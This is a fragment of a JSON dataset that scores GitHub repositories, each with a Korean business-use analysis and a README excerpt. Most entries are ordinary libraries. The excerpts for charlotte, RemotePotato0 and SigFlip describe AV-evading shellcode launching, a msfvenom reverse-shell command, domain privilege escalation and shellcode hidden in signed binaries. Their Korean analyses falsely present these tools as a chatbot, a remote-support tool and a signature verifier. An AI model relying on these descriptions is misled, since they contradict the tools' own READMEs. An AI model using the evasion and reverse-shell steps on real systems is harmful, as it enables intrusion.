weather","composite_score":0.509,"license_safety_tag":"unknown"},{"name":"p1r06u3/opencanary_web","github_url":"https://github.com/p1r06u3/opencanary_web","stars":7,"language":"Python","license":"BSD-3-Clause","abandonment_months":64,"description":"# p1r06u3/opencanary_web 평가 보고서\n\n## 왜 보물인가\n조직의 보안을 위협하는 침입자들을 미리 감지할 수 있는 '함정'을 설치해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 모니터링 SaaS**: 중소 기업들이 자신의 시스템에 함정을 설치하고 침입 시도를 실시간으로 감지하는 클라우드 서비스\n2. **내부 IT 보안 도","readme_excerpt":"## 一、web服务端介绍\nTornado+Vue+Mysql+APScheduler+Nginx+Supervisor\n\n### 1. 架构图\n![架构图](https://raw.githubusercontent.com/p1r06u3/opencanary_web/master/docs/images/honeypot.png)\n\n### 2. 功能展示\n\n#### 2.1 登录页面\n![登录页面](https://raw.githubusercontent.com/p1r06u3/opencanary_web/master/docs/images/login.png)\n\n#### 2.2 仪表盘\n![仪表盘](https://raw.githubusercontent.com/p1r06u3/opencanary_web/master/docs/images/dashboard.png)\n\n#### 2.3 主机状态\n![主机状态](https://raw.githubusercontent.com/p1r06u3/opencanary_web/master/docs/images/hoststatus.png)\n\n#### 2.4 攻击列表\n![攻击列表](https://raw.githubusercontent.com/p1r06u3/opencanary_web/master/docs/images/attacklist.png)\n\n#### 2.5 过滤列表\n![过滤列表](https://raw.githubusercontent.com/p1r06u3/opencanary_web/master/docs/images/filterlist.png)\n\n#### 2.6 邮件配置\n![邮件配置](https://raw.githubusercontent.com/p1r06u3/opencanary_web/master/docs/images/mailconf.png)\n\n#### 2.7 白名单ip\n![白名单ip](https://raw.githubusercontent.com/p1r06u3/opencanary_web/master/docs/images/whiteiplist.png)\n\n## 二、安装方式\n可以选择通过脚本","composite_score":0.509,"license_safety_tag":"safe"},{"name":"IvanVorobei/SPStorkController","github_url":"https://github.com/IvanVorobei/SPStorkController","stars":41,"language":"Swift","license":"MIT","abandonment_months":40,"description":"# SPStorkController 사업화 분석\n\n## 왜 보물인가\n아이폰 앱에서 사용자 화면 전환 시 자연스러운 애니메이션 효과를 쉽게 만들어주는 도구로, 앱의 사용성과 완성도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **아이폰 앱 개발 플랫폼**: 개발자들이 화면 전환 애니메이션을 손쉽게 구현할 수 있는 구독형 SaaS 서비스로 제공\n","readme_excerpt":"# SPStorkController\n\n<a href=\"https://itunes.apple.com/app/id1446635818\" target=\"_blank\"><img align=\"left\" src=\"https://github.com/ivanvorobei/SPStorkController/blob/master/Resources/Preview.gif\" width=\"400\"/></a>\n\n### About\nController **as in Apple Music, Podcasts and Mail** apps. Help if you need customize height or suppport modal style in iOS 12.\n\nSimple adding close button and centering arrow indicator. Customizable height. Using custom `TransitionDelegate`.\n\nAlert you can find in [SPAlert](https://github.com/ivanvorobei/SPAlert) project. It support diffrents presets, some animatable.\n\nIf you like the project, don't forget to `put star ★` and follow me on GitHub:\n\n<p float=\"left\">\n    <a href=\"https://github.com/ivanvorobei\">\n        <img src=\"https://github.com/ivanvorobei/Readme/blob/main/Buttons/follow-me-ivanvorobei.svg\">\n    </a>\n    <a href=\"https://opensource.ivanvorobei.by\">\n        <img src=\"https://github.com/ivanvorobei/Readme/blob/main/Buttons/more-libraries.svg\">\n    <","composite_score":0.5089,"license_safety_tag":"safe"},{"name":"antonioCoco/RemotePotato0","github_url":"https://github.com/antonioCoco/RemotePotato0","stars":5,"language":"C","license":"MIT","abandonment_months":42,"description":"# RemotePotato0 분석 보고서\n\n## 왜 보물인가\n컴퓨터를 원격으로 제어하는 기술을 누구나 쉽게 사용할 수 있도록 만든 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **원격 업무 지원 SaaS**: 회사 IT팀이 직원들의 컴퓨터 문제를 원격으로 진단하고 해결해주는 서비스\n2. **기술 지원 내부 도구**: 콜센터나 기술 지원팀이 고","readme_excerpt":"# RemotePotato0\n\n**UPDATE 21-10-2022: The main exploit scenario RPC->LDAP of RemotePotato0 has been fixed. More details at -->** https://twitter.com/splinter_code/status/1583555613950255104  \n\nJust another \"Won't Fix\" Windows Privilege Escalation from User to Domain Admin.\n\nRemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin. \n\nBriefly:\n\nIt abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine.\nIt is required that a privileged user is logged on the same machine (e.g. a Domain Admin user).\nOnce the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource.\nRemotePotato0 also allows to grab and steal ","composite_score":0.5089,"license_safety_tag":"safe"},{"name":"Pau1fitz/react-spotify","github_url":"https://github.com/Pau1fitz/react-spotify","stars":44,"language":"JavaScript","license":"MIT","abandonment_months":40,"description":"# react-spotify 상용화 분석\n\n## 왜 보물인가\n스포티파이와 연결되는 음악 앱을 쉽게 만들 수 있는 도구로, 음악 스트리밍 서비스를 원하는 누구나 자신의 앱을 빠르게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음악 플레이리스트 관리 SaaS**: 사용자가 스포티파이 음악을 정리하고 공유하는 웹 서비스\n2. **회사 업무용 배경음악","readme_excerpt":"# React-Spotify 🎺🎸🎻🎤\n\nThis is `React-Spotify` - a React front end client that communicates with the Spotify API.\n\nSee it in action [here](http://pau1fitz.github.io/react-spotify)\n\n![alt text](https://github.com/Pau1fitz/react-spotify/blob/master/songs.png \"Song\")\n\n\n![alt text](https://github.com/Pau1fitz/react-spotify/blob/master/browser.png \"Browse\")\n\nIf you wish to run the code locally run the following.\n\n```\nnpm\nnpm start\nvisit http://localhost:3000\n```\n\nYou can also run as an electron app by running `npm run electron-start`.\n\nPlease note that the Spotify API only provides 30 second audio snippets. It may be possible to get the full track by using the [Web Playback SDK](https://beta.developer.spotify.com/documentation/web-playback-sdk/).\n\n\n\n### License\n\nReleased under the MIT License. \n\nCheck [LICENSE.md](https://github.com/Pau1fitz/react-spotify/blob/master/LICENSE) for more info.\n","composite_score":0.5089,"license_safety_tag":"safe"},{"name":"meetalva/alva","github_url":"https://github.com/meetalva/alva","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":48,"description":"# meetalva/alva 분석 보고서\n\n## 왜 보물인가\n디자이너와 개발자가 함께 웹사이트 디자인을 만들고 수정할 수 있는 협업 도구로, 두 직군 간의 소통 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 디자인 협업 플랫폼으로 제공하여 중소 디자인 에이전시와 스타트업에 월 구독료 징수\n2. **내부 업무 ","readme_excerpt":"<p align=\"center\">\n<img src=\"https://meetalva.github.io/media/alva.svg\" width=\"300\">\n</p>\n\n# Meet Alva\n\n> Create living prototypes with code components\n>\n> https://meetalva.io\n\n\n# [Get Started](https://meetalva.io/doc/docs/start) | [Let's chat](https://gitter.im/meetalva/Lobby) | [Website](https://meetalva.io)\n\nStart with a minimal set of components to sketch concepts and iterate fast your team to create and enrich components, refine design and implemenation and compose a working, living prototype.\n\n> ⚠️ This is the contributor documentation of Alva. Please refer to [meetalva.io/doc/docs/guides](https://meetalva.io/doc/docs/start) for user docs.\n\n## Develop Alva\n\n* :turtle: :rocket: Node.js `>=8`\n* :evergreen_tree: Git\n* :cat2: yarn `>= 1.12`\n* :globe_with_meridians: Internet connection\n\n```sh\ngit clone https://github.com/meetalva/alva.git\ncd alva\nyarn\nyarn tsc -b -w\n\n# In a second terminal window\nyarn webpack -w\n\n# In a third terminal window\nyarn alva\n```\n\n## Package commands\n\nExecute","composite_score":0.5088,"license_safety_tag":"safe"},{"name":"9emin1/charlotte","github_url":"https://github.com/9emin1/charlotte","stars":22,"language":"Python","license":"unknown","abandonment_months":60,"description":"# Charlotte 저장소 평가\n\n## 왜 보물인가\nCharlotte는 대화형 인공지능 시스템으로, 사용자와 자연스럽게 상호작용하는 챗봇이나 가상 어시스턴트를 만드는 데 활용할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **고객 지원 챗봇 SaaS**: 온라인 쇼핑몰이나 은행 웹사이트에서 고객 질문에 자동으로 답변하는 서비스로 판매\n2. **기","readme_excerpt":"# charlotte\n c++ fully undetected shellcode launcher ;)\n\n releasing this to celebrate the birth of my newborn \n\n## description\n13/05/2021:\n\n1. c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.\n2. dynamic invoking of win32 api functions\n3. XOR encryption of shellcode and function names\n4. randomised XOR keys and variables per run\n5. on Kali Linux, simply 'apt-get install mingw-w64*' and thats it!\n\n17/05/2021:\n\n6. random strings length and XOR keys length \n\n## antiscan.me\n\n![alt_text](0-detection-charlotte.png \"Pwn!\")\n\n## usage\n\ngit clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py\n\nexample:\n1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*\n2. cd charlotte\n3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin\n4. python charlotte.py\n5. profit\n\n### tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload\n","composite_score":0.5088,"license_safety_tag":"unknown"},{"name":"cckuailong/vulbase","github_url":"https://github.com/cckuailong/vulbase","stars":43,"language":"HTML","license":"unknown","abandonment_months":56,"description":"# vulbase 저장소 분석\n\n## 왜 보물인가\n보안 취약점을 빠르게 찾아내고 관리하는 데이터베이스로, 기업의 시스템 안전을 지키는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소기업 IT담당자가 웹브라우저로 접속해 자사 시스템의 보안 약점을 자동으로 진단받는 월간 구독 서비스\n2. **내부 업무 도구**: 대기업 보안팀","readme_excerpt":"# Vulbase\n\n漏洞文库合集 (全部 gitbook 化)\n\n- P.S. Peiqi文库的图片已本地化，目前图片可正常访问\n\n## 导航页面\n\n![](./img/index.png)\n\n## docker 运行\n\n```\ndocker pull vultarget/vulbase:0.3\ndocker run -it -d -p 80:80 vultarget/vulbase:0.3\n```\n\n## 加入basic auth认证机制\n\n默认密码 admin / 1q2w3e4r\n\n自定义密码\n\n```\ndocker run -it -d -e AUTH_PASS=\"yourpassword\" -p 80:80 vultarget/vulbase:0.3\n```\n\n欢迎关注 **我不是Hacker** 公众号，不定期做一些分享\n![](http://wx.lovebear.cloud/nohacker.png)\n\n## ChangeLog\n\n### 2021.9.4\n\n- 加入wgpsec wiki\n- peiqi文库的图片本地化","composite_score":0.5088,"license_safety_tag":"unknown"},{"name":"gao-sun/eul","github_url":"https://github.com/gao-sun/eul","stars":5,"language":"Swift","license":"MIT","abandonment_months":24,"description":"# eul (gao-sun/eul) 분석 보고서\n\n## 왜 보물인가\n컴퓨터의 실시간 성능 상태(CPU, 메모리, 디스크 사용량 등)를 한눈에 보여주는 모니터링 도구로, 개인용부터 기업용까지 폭넓게 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 서버 모니터링 플랫폼으로 제공하여 기업들이 월 구독료를 내고 자신의 서","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://user-images.githubusercontent.com/14722250/93017676-1a009c00-f5fd-11ea-9b8e-c69c2cd4fa89.png\" height=64 />\n</p>\n\n# eul\n\n![Preview](https://user-images.githubusercontent.com/14722250/105626766-f718ab00-5e6c-11eb-9761-661ff85c8faf.jpg)\n\n## Highlights\n\n- Dark Mode compatible\n- Big Sur widgets out of the box\n- Bluetooth battery level\n- Written in SwiftUI (as much as possible)\n\n## OS Requirement\n\nmacOS 10.15 minimum for SwiftUI support\n\n## Installation\n\n### Download\n\nDownload the [latest release](https://github.com/gao-sun/eul/releases/latest/download/eul.app.zip) directly and drag `.app` file into your `Application` folder.\n\n### Homebrew Cask\n\n```bash\nbrew install --cask eul\n```\n\n### App Store\n\nSearch `eul` or [click here](https://apps.apple.com/us/app/eul/id1537133867) to view in App Store.\n\nNote:\n\n1. Some features are disabled due to the removal of all SMC calls.\n2. The version is out-dated.\n\n### Release Notes\n\n[Click here](https://github.com/gao-su","composite_score":0.5087,"license_safety_tag":"safe"},{"name":"SwinTransformer/Video-Swin-Transformer","github_url":"https://github.com/SwinTransformer/Video-Swin-Transformer","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":39,"description":"# Video-Swin-Transformer 상용화 분석\n\n## 왜 보물인가\n동영상에서 중요한 장면을 자동으로 인식하는 AI 기술로, 보안·의료·스포츠 등 다양한 산업에서 실시간 분석이 필요한 곳에 즉시 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 영상 자동 분석 플랫폼**\n- CCTV 영상에서 이상 상황(침입, 싸움 등)을","readme_excerpt":"# Video Swin Transformer\n\n[![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/video-swin-transformer/action-classification-on-kinetics-400)](https://paperswithcode.com/sota/action-classification-on-kinetics-400?p=video-swin-transformer)\n[![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/video-swin-transformer/action-classification-on-kinetics-600)](https://paperswithcode.com/sota/action-classification-on-kinetics-600?p=video-swin-transformer)\n[![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/video-swin-transformer/action-recognition-in-videos-on-something)](https://paperswithcode.com/sota/action-recognition-in-videos-on-something?p=video-swin-transformer)\n\nBy [Ze Liu](https://github.com/zeliu98/)\\*, [Jia Ning](https://github.com/hust-nj)\\*, [Yue Cao](http://yue-cao.me),  [Yixuan Wei](https://github.com/weiyx16), [Zheng Zhang](https://stupidzz.github.io/), [Stephen Lin](https://scholar.google.com/c","composite_score":0.5087,"license_safety_tag":"safe"},{"name":"karpathy/arxiv-sanity-lite","github_url":"https://github.com/karpathy/arxiv-sanity-lite","stars":45,"language":"Python","license":"MIT","abandonment_months":36,"description":"# arxiv-sanity-lite 분석\n\n## 왜 보물인가\n과학 논문 수천 개를 자동으로 정리하고 검색할 수 있는 도구로, 연구자들이 방대한 논문 더미에서 자신의 관심사를 찾는 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독형 \"AI 논문 큐레이션 플랫폼\"으로, 사용자가 관심 주제를 설정하면 매주 추천","readme_excerpt":"\n# arxiv-sanity-lite\n\nA much lighter-weight arxiv-sanity from-scratch re-write. Periodically polls arxiv API for new papers. Then allows users to tag papers of interest, and recommends new papers for each tag based on SVMs over tfidf features of paper abstracts. Allows one to search, rank, sort, slice and dice these results in a pretty web UI. Lastly, arxiv-sanity-lite can send you daily emails with recommendations of new papers based on your tags. Curate your tags, track recent papers in your area, and don't miss out!\n\nI am running a live version of this code on [arxiv-sanity-lite.com](https://arxiv-sanity-lite.com).\n\n![Screenshot](screenshot.jpg)\n\n#### To run\n\nTo run this locally I usually run the following script to update the database with any new papers. I typically schedule this via a periodic cron job:\n\n```bash\n#!/bin/bash\n\npython3 arxiv_daemon.py --num 2000\n\nif [ $? -eq 0 ]; then\n    echo \"New papers detected! Running compute.py\"\n    python3 compute.py\nelse\n    echo \"No new pap","composite_score":0.5087,"license_safety_tag":"safe"},{"name":"yuval-alaluf/hyperstyle","github_url":"https://github.com/yuval-alaluf/hyperstyle","stars":194,"language":"Python","license":"MIT","abandonment_months":45,"description":"# HyperStyle 사업화 분석\n\n## 왜 보물인가\n누구나 찍은 평범한 사진을 유명 화가의 그림처럼 변환할 수 있는 기술로, 창의적인 콘텐츠 제작에 혁신을 가져올 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 사진 편집 SaaS 서비스**\n개인 사용자가 구독하는 온라인 도구로 제공하여, 자신의 사진을 예술작품으로 변환할 수 있게 합니다.\n\n**2.","readme_excerpt":"# HyperStyle: StyleGAN Inversion with HyperNetworks for Real Image Editing (CVPR 2022)\n\n> Yuval Alaluf*, Omer Tov*, Ron Mokady, Rinon Gal, Amit H. Bermano  \n> *Denotes equal contribution  \n> \n> The inversion of real images into StyleGAN's latent space is a well-studied problem. Nevertheless, applying existing approaches to real-world scenarios remains an open challenge, due to an inherent trade-off between reconstruction and editability: latent space regions which can accurately represent real images typically suffer from degraded semantic control. Recent work proposes to mitigate this trade-off by fine-tuning the generator to add the target image to well-behaved, editable regions of the latent space. While promising, this fine-tuning scheme is impractical for prevalent use as it requires a lengthy training phase for each new image. In this work, we introduce this approach into the realm of encoder-based inversion. We propose HyperStyle, a hypernetwork that learns to modulate StyleGAN'","composite_score":0.5086,"license_safety_tag":"safe"},{"name":"arturbien/React95","github_url":"https://github.com/arturbien/React95","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":29,"description":"# React95 프로젝트 분석\n\n## 왜 보물인가\n1990년대 Windows 95 스타일의 인터페이스를 현대 웹사이트에 구현할 수 있는 디자인 도구로, 복고 미학을 원하는 기업과 개발자들에게 독특한 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n- **복고 테마 SaaS**: 1990년대 감성의 프로젝트 관리 도구나 할 일 목록 앱을 구독 서비스로 제공\n","readme_excerpt":"<h1 align=\"center\">React95</h1>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/react95\"><img src=\"https://flat.badgen.net/npm/dt/react95\" alt=\"NPM\" /></a>\n  <a href=\"https://github.com/arturbien/React95/actions/workflows/release.yml\"><img src=\"https://github.com/arturbien/React95/actions/workflows/release.yml/badge.svg\" alt=\"release status\" /></a>\n  <a href=\"https://www.npmjs.com/package/react95\"><img src=\"https://flat.badgen.net/npm/v/react95\" alt=\"React95 version\" /></a>\n  <a href=\"https://www.npmjs.com/package/react95\"><img src=\"https://flat.badgen.net/npm/license/react95\" alt=\"React95 license\" /></a>\n  <a href=\"https://twitter.com/intent/follow?screen_name=react95_io\"><img src=\"https://img.shields.io/twitter/follow/react95_io\" alt=\"React95 license\" /></a>\n</p>\n<h3 align=\"center\">\n  <a href=\"https://storybook.react95.io/?path=/story/window--default\">Components</a> -\n  <a href=\"https://coins95.web.app/\">Demo app</a> -\n  <a href=\"https://github.com/react95-io/react95-nat","composite_score":0.5086,"license_safety_tag":"safe"},{"name":"bombardier-gif/covid-vaccine-booking","github_url":"https://github.com/bombardier-gif/covid-vaccine-booking","stars":16,"language":"Python","license":"unknown","abandonment_months":48,"description":"# COVID 백신 예약 시스템 평가\n\n## 왜 보물인가\n백신 접종 예약이라는 실제 사회 문제를 자동화로 해결한 실용적인 기술로, 보건당국이나 의료기관에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 백신 접종소·의원이 구독하는 온라인 예약 관리 플랫폼으로 월별 요금 청구\n2. **내부 업무 도구**: 보건소나 병원이 자","readme_excerpt":"<h1 align=\"center\"> Bombardier Fully Automated COVID-19 Vaccination Slot Booking Script</h1>\n\n<div align=\"center\">\n\n<i>This is a fork over the neat [covid-vaccine-booking](https://github.com/pallupz/covid-vaccine-booking). Thanks for creating a playground for me to build on :metal:</i>\n<i>It allows rescheduling for both dose 1 and 2 withing the script but Only 1 beneficiary at a time</i>\n\n</div>\n\n## Guide\n\n### Pre-requisites\n\n1. [Setup on Windows/Linux/MacOS/Docker/AWS](https://github.com/bombardier-gif/covid-vaccine-booking/wiki/Setup) (Required)\n2. [KVDB Bucket](https://github.com/bombardier-gif/covid-vaccine-booking/wiki/KVDB)\n3. Phone Setup\n   1. Android\n      1. [CoWIN OTP Retriever](https://github.com/bombardier-gif/covid-vaccine-booking/wiki/CoWIN-OTP-Retriever) (Recommended)\n      2. [IFTTT](https://github.com/bombardier-gif/covid-vaccine-booking/wiki/IFTTT)\n   2. [iPhone](https://github.com/bombardier-gif/covid-vaccine-booking/wiki/Shortcuts)\n\n### Usage\n\n`./covid-vaccine-slot-","composite_score":0.5086,"license_safety_tag":"unknown"},{"name":"flutter/photobooth","github_url":"https://github.com/flutter/photobooth","stars":14,"language":"Dart","license":"mit","abandonment_months":39,"description":"# Flutter Photobooth 프로젝트 분석\n\n## 왜 보물인가\n스마트폰 카메라로 인생샷을 찍어주는 자동화된 포토부스 앱으로, 행사장이나 상점에서 즉시 활용할 수 있는 완성된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이벤트 회사를 위한 클라우드 기반 사진 관리 및 편집 플랫폼으로 제공\n2. **내부 업무 도구**: 대형","readme_excerpt":"# I/O Photo Booth\n\n[![Photo Booth Header][logo]][photo_booth_link]\n\n[![io_photobooth][build_status_badge]][workflow_link]\n![coverage][coverage_badge]\n[![style: very good analysis][very_good_analysis_badge]][very_good_analysis_link]\n[![License: MIT][license_badge]][license_link]\n\nA Photo Booth built with [Flutter][flutter_link] and [Firebase][firebase_link] for [Google I/O 2021][google_io_link].\n\n[Try it now][photo_booth_link] and [learn about how it's made][blog_link].\n\n*Built by [Very Good Ventures][very_good_ventures_link] in partnership with Google*\n\n*Created using [Very Good CLI][very_good_cli_link] 🤖*\n\n---\n\n## Getting Started 🚀\n\nTo run the desired project either use the launch configuration in VSCode/Android Studio or use the following commands:\n\n```sh\n$ flutter run -d chrome\n```\n\n_\\*I/O Photo Booth works on Web._\n\n---\n\n## Running Tests 🧪\n\nTo run all unit and widget tests use the following command:\n\n```sh\n$ flutter test --coverage --test-randomize-ordering-seed random\n```\n\nTo view","composite_score":0.5086,"license_safety_tag":"safe"},{"name":"TsinghuaAI/CPM-Generate","github_url":"https://github.com/TsinghuaAI/CPM-Generate","stars":10,"language":"Python","license":"MIT","abandonment_months":39,"description":"# CPM-Generate 상용화 분석\n\n## 왜 보물인가\n청화대학교의 고성능 AI가 자동으로 글, 코드, 이미지 등 다양한 콘텐츠를 생성해주는 기술로, 콘텐츠 제작 비용을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 기업용 '자동 보도자료/이메일 마케팅 생성 서비스'로 출시 (마케팅팀이 직접 활용)\n\n**2. 내부","readme_excerpt":"# CPM-Generate\n\n为了促进中文自然语言处理研究的发展，本项目提供了 **CPM-LM** (2.6B) 模型的文本生成代码，可用于文本生成的本地测试，并以此为基础进一步研究零次学习/少次学习等场景。[[模型下载](https://model.baai.ac.cn/model-detail/100017)] [[技术报告](https://www.sciencedirect.com/science/article/pii/S266665102100019X)]\n\n**若您想使用CPM-1进行推理，我们建议使用高效推理工具[BMInf](https://github.com/OpenBMB/BMInf)，支持1060以上显卡单卡推理。**\n\n## 安装\n\n首先安装pytorch等基础依赖，再安装[APEX](https://github.com/NVIDIA/apex#quick-start)以支持fp16：\n```\npip install -r requirements.txt\ngit clone https://github.com/NVIDIA/apex\ncd apex\npip install -v --no-cache-dir --global-option=\"--cpp_ext\" --global-option=\"--cuda_ext\" ./\n```\n\n考虑apex的安装容易发生问题，我们构建了对应的Docker容器，可以进行快速环境搭建。安装方式如下：\n```\ndocker pull dmye/cpm:v0\n```\n参考运行指令如下：\n```\nsudo docker run --gpus '\"device=0,1\"' -it -v <path>:/CPM  --name=cpm  cpm:v0\n```\n其中`<path>`为代码所在目录，-v进行文件目录挂载\n\n注：感谢qhduan同学提供了基于TensorFlow的[使用代码](https://github.com/qhduan/CPM-LM-TF2)，用作Pytorch之外的备选。\n\n## 模型\n\n模型下载后文件夹的目录结构需设置如下：\n```\n.\n├── 80000\n│   ├── mp_rank_00_model_states.pt\n│   └── mp_rank_01_model_st","composite_score":0.5086,"license_safety_tag":"safe"},{"name":"davidortinau/WeatherTwentyOne","github_url":"https://github.com/davidortinau/WeatherTwentyOne","stars":8,"language":"C#","license":"MIT","abandonment_months":29,"description":"# WeatherTwentyOne 저장소 분석\n\n## 왜 보물인가\n날씨 정보를 보여주는 현대적이고 깔끔한 앱을 빠르게 만들 수 있는 완성된 설계도입니다.\n\n## 어디에 쓸 수 있나\n1. **날씨 정보 SaaS**: 기업이나 개인이 구독해서 정확한 날씨와 생활 팁을 받는 월간 서비스\n2. **내부 업무 도구**: 물류·농업·건설업체가 날씨 데이터를 자동으로 ","readme_excerpt":"# Weather '21\n\nThis is a [.NET MAUI](https://github.com/dotnet/maui) app showcasing .NET 6 Preview progress. For more information about what's included, [read the blogs](https://devblogs.microsoft.com/dotnet/category/maui/).\n\n![.NET MAUI Weather App on all platforms](images/maui-weather-hero-sm.png)\n\n## Requirements\n\nSetup instructions for Windows and Mac are [here on the dotnet/maui wiki](https://github.com/dotnet/maui/wiki#getting-started).\n\n## Platform Integrations\n\nTo demonstrate how easily you can enable platform-native integrations, we added a handful of features:\n\n* App Actions - Microsoft.Maui.Essentials provides a simple API to add shortcuts you access from the app icon\n* System Tray - added the .NET bot to the tray on Windows and status bar on macOS\n* Notifications - trigger a notification when clicking the bot\n\n![gallery of platform images](images/platform-integrations.png)\n\n## Four Platforms, One Project\n\nThe WeatherTwentyOne project is a multi-targeted SDK project that can","composite_score":0.5086,"license_safety_tag":"safe"},{"name":"med0x2e/SigFlip","github_url":"https://github.com/med0x2e/SigFlip","stars":9,"language":"C#","license":"MIT","abandonment_months":33,"description":"# SigFlip 상용화 분석\n\n## 왜 보물인가\n디지털 서명을 간편하게 검증하고 관리할 수 있는 도구로, 보안이 중요한 온라인 거래와 문서 인증 분야에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 전자계약 플랫폼이 SigFlip을 통합하여 계약서 서명 검증 기능을 자동화\n2. **내부 업무 도구**: 금융회사나 법무팀이 중","readme_excerpt":"### What is it ?\n\nSigFlip is a tool for patching authenticode signed PE files (exe, dll, sys ..etc) in a way that doesn't affect or break the existing authenticode signature, in other words you can change PE file checksum/hash by embedding data (i.e shellcode) without breaking the file signature, integrity checks or PE file functionality.\n\nSigInject encrypts and injects shellcode into a PE file's [WIN_CERTIFICATE] certificate table, the encryption key is printed out for usage with a basic BOF/C/C# loader (SigLoader), SigInject saves changes to a modified PE file and keeps its signature and certificate validity intact.\n\nSigLoader is a basic loader which takes a modified PE file path created by SigInject and the decryption key as parameters, then extract and decrypt embedded shellcode for usage with a shellcode injection of choice.\n\nSigFlip will check if PE hash was successfully changed and also check and exit gracefully in case endpoints are hardened against such common misconfiguration","composite_score":0.5085,"license_safety_tag":"safe"},{"name":"CodeWithHarry/NewsMonkey-React","github_url":"https://github.com/CodeWithHarry/NewsMonkey-React","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":26,"description":"# NewsMonkey-React 상용화 분석\n\n## 왜 보물인가\n뉴스 웹사이트를 만들 수 있는 무료 기초 틀을 제공해서 신문사나 블로그 운영자들이 처음부터 개발할 필요 없이 빠르게 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 뉴스레터 플랫폼을 구독자에게 월 $9.99에 판매 (누구나 자신의 뉴스 채널 개설 가능)\n2","readme_excerpt":"# Getting Started with Create React App\n\nThis project was bootstrapped with [Create React App](https://github.com/facebook/create-react-app).\n\n## Available Scripts\n\nIn the project directory, you can run:\n\n### `npm start`\n\nRuns the app in the development mode.\\\nOpen [http://localhost:3000](http://localhost:3000) to view it in the browser.\n\nThe page will reload if you make edits.\\\nYou will also see any lint errors in the console.\n\n### `npm test`\n\nLaunches the test runner in the interactive watch mode.\\\nSee the section about [running tests](https://facebook.github.io/create-react-app/docs/running-tests) for more information.\n\n### `npm run build`\n\nBuilds the app for production to the `build` folder.\\\nIt correctly bundles React in production mode and optimizes the build for the best performance.\n\nThe build is minified and the filenames include the hashes.\\\nYour app is ready to be deployed!\n\nSee the section about [deployment](https://facebook.github.io/create-react-app/docs/deployment) for m","composite_score":0.5085,"license_safety_tag":"unknown"},{"name":"tower1229/Vue-Access-Control","github_url":"https://github.com/tower1229/Vue-Access-Control","stars":17,"language":"Vue","license":"MIT","abandonment_months":27,"description":"# Vue-Access-Control 분석 리포트\n\n## 왜 보물인가\n웹사이트나 앱에서 \"누가 어떤 기능을 쓸 수 있는지\" 통제하는 시스템으로, 모든 온라인 서비스에 반드시 필요한 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 협업 도구**: 팀 관리 소프트웨어에서 팀장은 모든 기능, 팀원은 일부만 사용 가능하게 설정\n2. **내부 업무 도","readme_excerpt":"English | [中文](README_CN.md)\n\n# vue-access-control\n\n[![Build Status](https://travis-ci.com/tower1229/Vue-Access-Control.svg?branch=master)](https://travis-ci.com/tower1229/Vue-Access-Control)  [![license](https://img.shields.io/github/license/tower1229/Vue-Access-Control.svg)]()\n\n> :gem: Frontend access control framework based Vue\n\n![logo](https://refined-x.com/asset/vsc-logo.png)\n\n## [A new version](https://github.com/tower1229/Vue-Access-Control/tree/v2) is ready, with a modular design that is less invasive to the business, fully compatible with V1 version interface data\n\n-----\n\n## Introduction\n\nVue-Access-Control is a solution of front-end user rights control based on Vue/Vue-Router/axios,through the control of three levels of routing, view and request, the developer can realize the user authority control of any granularity.\n\nThe management function can refer to [CuttingMat](https://github.com/cutting-mat) project.\n\n## Documentation\n\n[Vue2.0用户权限控制解决方案](http://refined-x.com/2017/11/2","composite_score":0.5084,"license_safety_tag":"safe"},{"name":"ilmoi/awesome-solana-nfts","github_url":"https://github.com/ilmoi/awesome-solana-nfts","stars":7,"language":"","license":"unknown","abandonment_months":25,"description":"# Awesome Solana NFTs 평가 분석\n\n## 왜 보물인가\n솔라나 블록체인의 디지털 자산 정보를 한곳에 모아놓아서, NFT 투자자나 개발자가 빠르게 프로젝트를 찾고 비교할 수 있는 길잡이 역할을 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **NFT 마켓플레이스 서비스**: 솔라나 NFT 프로젝트 정보를 자동으로 수집하고 